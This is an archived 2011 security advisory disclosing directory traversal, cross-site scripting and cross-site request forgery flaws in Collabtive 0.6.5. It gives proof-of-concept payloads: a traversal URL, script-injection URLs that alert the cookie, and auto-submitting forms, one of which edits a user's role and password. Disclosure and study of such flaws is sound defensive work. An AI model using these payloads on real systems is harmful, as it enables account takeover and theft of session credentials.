Collabtive 0.6.5 XSS / XSRF / Directory Traversal

Collabtive 0.6.5 XSS / XSRF / Directory Traversal: Posted Mar 31, 2011; Authored by High-Tech Bridge SA | Site htbridge.com; Collabtive version 0.6.5 suffers from cross site request forgery, cross site scripting, and directory traversal vulnerabilities.; tags | exploit, vulnerability, xss, file inclusion, csrf; SHA-256 | d2c5bc279c635ee10b524daef2da96cdde8272b3fefdcde49f0ea0499ea410c6; Download | Favorite | View

Collabtive 0.6.5 XSS / XSRF / Directory Traversal

==============================
Vulnerability ID: HTB22907
Reference: http://www.htbridge.ch/advisory/directory_traversal_in_collabtive.html
Product: Collabtive
Vendor: Open Dynamics ( http://collabtive.o-dyn.de/ ) 
Vulnerable Version: 0.6.5 and probably prior versions
Vendor Notification: 17 March 2011 
Vulnerability Type: Directory Traversal Vulnerability
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

Vulnerability Details:
An attacker can disclose arbitrary image file content.

The vulnerability exists due to failure in the "thumb.php" script to properly sanitize user-supplied input in "pic" variable.

Attacker can use browser to exploit this vulnerability. The following PoC is available:
http://host/thumb.php?pic=./../../../../../tmp/photo.jpg

==============================
Vulnerability ID: HTB22906
Reference: http://www.htbridge.ch/advisory/xss_vulnerabilities_in_collabtive.html
Product: Collabtive
Vendor: Open Dynamics ( http://collabtive.o-dyn.de/ ) 
Vulnerable Version: 0.6.5 and probably prior versions
Vendor Notification: 17 March 2011 
Vulnerability Type: XSS
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the "managetimetracker.php", "manageproject.php", "manageuser.php", "admin.php" scripts to properly sanitize user-supplied input in "id", "name" variables. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is available:
1.

http://host/managetimetracker.php?action=editform&tid=1&id=1"><script>alert(document.cookie)</script>

2.

http://host/manageuser.php?action=profile&id=1"><script>alert(document.cookie)</script>


3.

<form action="http://host/manageproject.php?action=edit&id=1" method="post" name="main">
<input type="hidden" name="name" value='test"><script>alert(document.cookie)</script>'>
<input type="hidden" name="desc" value="Description">
<input type="hidden" name="end" value="16.03.2011">
</form>
<script>
document.main.submit();
</script>


4.

<form action="http://host/admin.php?action=editsets" method="post" name="main" enctype="multipart/form-data">
<input type="hidden" name="name" value='Collabtive"><script>alert(document.cookie)</script>'>
<input type="hidden" name="subtitle" value="Projectmanagement">
<input type="hidden" name="locale" value="en">
<input type="hidden" name="timezone" value="Europe/Zurich">
<input type="hidden" name="rssuser" value="">
<input type="hidden" name="rsspass" value="">
<input type="hidden" name="dateformat" value="d.m.Y">
<input type="hidden" name="template" value="standard">
</form>
<script>
document.main.submit();
</script>


==============================
Vulnerability ID: HTB22908
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_collabtive.html
Product: Collabtive
Vendor: Open Dynamics ( http://collabtive.o-dyn.de/ ) 
Vulnerable Version: 0.6.5 and probably prior versions
Vendor Notification: 17 March 2011 
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Risk level: Low 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

Vulnerability Details:
The vulnerability exists due to failure in the "manageuser.php" script to properly verify the source of HTTP request.

Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

Attacker can use browser to exploit this vulnerability. The following PoC is available:

<form action="http://host/admin.php?action=edituser&id=USERID" method="post" name="main" enctype="multipart/form-data">
<input type="hidden" name="name" value="username">
<input type="hidden" name="email" value="email@example.com">
<input type="hidden" name="locale" value="en">
<input type="hidden" name="admin" value="">
<input type="hidden" name="newpass" value="">
<input type="hidden" name="repeatpass" value="">
<input type="hidden" name="role" value="1">
</form>
<script>
document.main.submit();
</script>

Top Authors In Last 30 Days

Red Hat 228 files
Ubuntu 55 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Google Security Research 6 files
Apple 6 files
Milad Karimi 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,333)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,578)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,460)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Collabtive 0.6.5 XSS / XSRF / Directory Traversal

Collabtive 0.6.5 XSS / XSRF / Directory Traversal

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Collabtive 0.6.5 XSS / XSRF / Directory Traversal

Share This

Collabtive 0.6.5 XSS / XSRF / Directory Traversal

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems